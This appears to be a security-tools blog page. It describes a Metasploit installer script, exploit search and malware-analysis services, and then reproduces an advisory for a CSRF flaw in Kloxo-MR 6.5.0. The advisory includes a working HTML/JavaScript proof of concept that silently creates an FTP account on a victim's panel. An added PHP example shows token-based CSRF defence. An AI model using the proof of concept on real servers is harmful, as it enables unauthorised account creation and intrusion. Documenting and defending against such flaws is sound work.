MSF-Installer [Script to Automate Metasploit Framework Installation]

Script to help with installing and configuring Metasploit Framework, Armitage and the Plugins I have written on OSX and Linux.

To use the script on OSX, Java, Xcode and the Command Development Tools from Xcode must be installed before running the script. In the case of OSX I also added the option of installing GNU GCC in case you want to compile the old Ruby 1.8.7, which requires it. When you download the script you must make it executable; when run with no arguments or with -h it will show the usage help message:
$ chmod +x msf_install.sh 
$ ./msf_install.sh -h
Scritp for Installing Metasploit Framework
By Carlos_Perez[at]darkoperator.com
Ver 0.1.0

-i                :Install Metasploit Framework.
-p      :password for MEtasploit databse msf user. If not provided a roandom one is generated for you.
-g                :Install GNU GCC (Not necessary uless you wish to compile and install ruby 1.8.7 in OSX
-h                :This help message
To start the installation you just run the script with the -i option and the installation will start. In the case of OSX it will:
  • Check that dependencies are met.
  • Check if Homebrew is installed and if not it will install it.
  • Install Ruby 1.9.3
  • Install base ruby gems.
  • Install and configure Postgres for use with Metasploit
  • Install GCC if selected.
  • Download and install Metasploit Framework.
  • Install all necessary Ruby Gems using bundler.
  • Configure the database connection and sets the proper environment variables.
  • Download and install the latest version of Armitage.
  • Download and install the Pentest plugin and DNSRecon Import plugin.

In the case of Ubuntu 12.10 and 13.04 it will:
  • Install all necessary packages
  • Install base ruby gems.
  • Configure Postgres for use with Metasploit
  • Download and install Metasploit Framework.
  • Install all necessary Ruby Gems using bundler.
  • Configure the database connection and sets the proper environment variables.
  • Download and install the latest version of Armitage.
  • Download and install the Pentest plugin and DNSRecon Import plugin.


ExploitSearch.net [Exploit / Vulnerability Search Engine]

Exploitsearch.net is an attempt at cross-referencing and correlating exploit and vulnerability data from various sources and making the resulting database available to everyone.

Unlike other exploit search engines, which are simply custom Google searches, this site actually crawls the source databases and websites and parses the data they contain. Once the data is collected and parsed, it is inserted into the www.exploitsearch.net database and becomes available for searching.


Cuckoo Sandbox v0.6 [Software for Automating Analysis]


Cuckoo Sandbox is open source software for automating analysis of suspicious files. To do so it makes use of custom components that monitor the behavior of the malicious processes while running in an isolated environment.
Cuckoo generates several kinds of raw data, which include:
  • Native functions and Windows API calls traces
  • Copies of files created and deleted from the filesystem
  • Dump of the memory of the selected process
  • Screenshots of the desktop during the execution of the malware analysis
  • Network dump generated by the machine used for the analysis
To make these results easier for end users to consume, Cuckoo can process them and generate different types of reports, which could include:

  • JSON report
  • HTML report
  • MAEC report
  • MongoDB interface
  • HPFeeds interface

Cuckoo Sandbox 0.6 (2012-04-15)
===============================
(note for author’s blog)

This release represents a major step forward for the quality of the project: you won’t find an endless list of new features this time, but a handful of solid improvements that should make your experience with sandboxing much more pleasant.
Along with a few smaller additions, the focus of 0.6 revolves around the introduction of network logging. Until now the retrieval of the analysis results from the analysis machines happened through an inefficient and resource-expensive XMLRPC transaction. With Cuckoo Sandbox 0.6 we are now able to collect behavioral logs, dropped files, screenshots and memory dumps in real-time from the analysis machines through the use of what has been called ResultServer.
The advantages of this approach are multiple:
  • You will now see results coming in in real-time.
  • The memory errors and timeouts that used to occur with previous versions when trying to retrieve the results are now gone!
  • Even if the analysis machine is somehow compromised (crashed, shutdown or otherwise locked) you will still have complete results up to that point.
  • Probably some more advantages, but it’s already awesome as it is.


Comodo Instant Malware Analysis [Online Automated Analysis System]

If you have a suspicious file, please submit it online by using the form below. Once the file is submitted, COMODO Automated Analysis System will scan it and report back its findings.

[Comodo Instant Malware Analysis]


VirusTotal [Online Malware Analysis Tool]

VirusTotal, a subsidiary of Google, is a free online service that analyzes files and URLs enabling the identification of viruses, worms, trojans and other kinds of malicious content detected by antivirus engines and website scanners. At the same time, it may be used as a means to detect false positives, i.e. innocuous resources detected as malicious by one or more scanners.

VirusTotal’s mission is to help in improving the antivirus and security industry and make the internet a safer place through the development of free tools and services.


VirusTotal Scanner

VirusTotal Scanner is a desktop tool for quickly performing an anti-virus scan using VirusTotal.com.
VirusTotal.com is a free online scan service that analyzes suspicious files using 40+ anti-virus applications. It facilitates the quick detection of viruses, worms, trojans and all kinds of malware, and provides reliable results, preventing any false positive cases.

'VirusTotal Scanner' is the desktop tool which helps you to quickly scan your file using VirusTotal without actually uploading the file. It performs a direct hash-based scan on VirusTotal, thus saving the time it would take to upload the file.
It comes with an attractive and user-friendly interface that makes the VirusTotal scanning process simpler and quicker. You can simply right-click on your file and start the scan.

It is a fully portable tool but also comes with an installer for local installation and uninstallation. It works on a wide range of platforms, from Windows XP to Windows 8.


Kloxo-MR 6.5.0 CSRF Vulnerability

# Exploit Title     :Kloxo-MR 6.5.0 CSRF Vulnerability
# Vendor Homepage   :https://github.com/mustafaramadhan/kloxo/tree/dev
# Version   :Kloxo-MR 6.5.0.f-2014020301
# Tested on         :Centos 6.4
# Exploit Author    :Necmettin COSKUN =>@babayarisi
# Blog              :http://www.ncoskun.com http://www.grisapka.org
# Discovery date    :03/12/2014
# CVE               :N/A
  
Kloxo-MR is a special edition (fork) of Kloxo with many features that do not exist in the official Kloxo release (6.1.12+).
The fork is named Kloxo-MR (meaning 'Kloxo fork by Mustafa Ramadhan').
================
CSRF Vulnerability

Vulnerability
================
Kloxo-MR, like Kloxo stable, has lots of POST- and GET-based forms. Some inputs are escaped for special characters, but the inputs don't have any CSRF protection or secret key.
So a remote attacker can manipulate these forms to add/delete MySQL users, create/delete subdomains or add/delete FTP accounts.
 
Poc Exploit
================
 
 <html>
 <head><title>Kloxo-MR demo</title></head>
 <script type="text/javascript">
 function yurudi(){
        ///////////////////////////////////////////////////////////
        //Kloxo-MR 6.5.0  CSRF Vulnerability         //
        //Author:Necmettin COSKUN => twitter.com/@babayarisi  //
        //Blog: http://www.ncoskun.com | http://www.grisapka.org //
        ///////////////////////////////////////////////////////////
        //Remote host
        var host="victim.com"; 
        //New Ftp Username
        var username="demouser";
        //New Ftp Password
        var pass="12345678";
        //This creates new folder under admin dir. /admin/yourfolder
        var dir="demodirectory";
        //If necessary only modify http to https ;)
        var urlson="http://"+host+":7778//display.php?frm_o_cname=ftpuser&frm_dttype&frm_ftpuser_c_nname="+username+"&frm_ftpuser_c_complete_name_f=--direct--&frm_ftpuser_c_password="+pass+"&frm_confirm_password="+pass+"&frm_ftpuser_c_directory="+dir+"&frm_ftpuser_c_ftp_disk_usage&frm_action=add";
 
        document.getElementById('demoexploit').src=urlson;
}
 </script>
 <body onload="yurudi();">
 <img id="demoexploit" src=""></img>
 </body>
 </html>
  
  
Discovered by:
================
Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!
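
The control the advisory says is missing, as an added example that is not Kloxo-MR's code and not part of the original advisory: a per-session token required on every state-changing request, with state changes refused over GET. The function names, the `frm_csrf_token` field, the session-secret handling and the rule that any request carrying `frm_action` changes state are assumptions; only the `frm_*` parameter names in the sample come from the PoC URL.

```php
<?php
// Added example, not Kloxo-MR code. Hypothetical names: csrf_token(),
// request_allowed(), and the frm_csrf_token form field.

// Per-session token: HMAC of the session id under a server-side secret.
function csrf_token(string $sessionId, string $secret): string
{
    return hash_hmac('sha256', $sessionId, $secret);
}

// Returns true if the request may be processed.
// Assumption: any request carrying frm_action changes state.
function request_allowed(string $method, array $params, string $sessionId, string $secret): bool
{
    if (!isset($params['frm_action'])) {
        return true;    // plain page view, nothing to protect
    }
    if (strtoupper($method) !== 'POST') {
        return false;   // an <img src> or link can only issue GET
    }
    $sent = $params['frm_csrf_token'] ?? '';
    // Constant-time comparison against the token bound to this session.
    return is_string($sent) && hash_equals(csrf_token($sessionId, $secret), $sent);
}

// Constructed sample input: parameters in the shape of the PoC query string.
$secret    = bin2hex(random_bytes(32));   // created at login, never sent to the client
$sessionId = 'constructed-session-id';
parse_str('frm_o_cname=ftpuser&frm_ftpuser_c_nname=demouser&frm_action=add', $forged);

// What the panel's own form would submit: same fields plus the hidden token.
$legit = $forged + ['frm_csrf_token' => csrf_token($sessionId, $secret)];

$cases = [
    'GET without token (image load)'    => ['GET',  $forged],
    'POST without token (foreign form)' => ['POST', $forged],
    'POST with session token'           => ['POST', $legit],
];
foreach ($cases as $label => [$method, $params]) {
    $ok = request_allowed($method, $params, $sessionId, $secret);
    echo str_pad($label, 36), $ok ? 'accepted' : 'rejected', PHP_EOL;
}
```

The token has to be emitted as a hidden field in every form the panel renders; a page on another origin cannot read it, so it cannot include it in a forged request.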


Copyright © 2013 Hacking Tools and Tech eBooks Collection and Blogger Templates - Anime OST.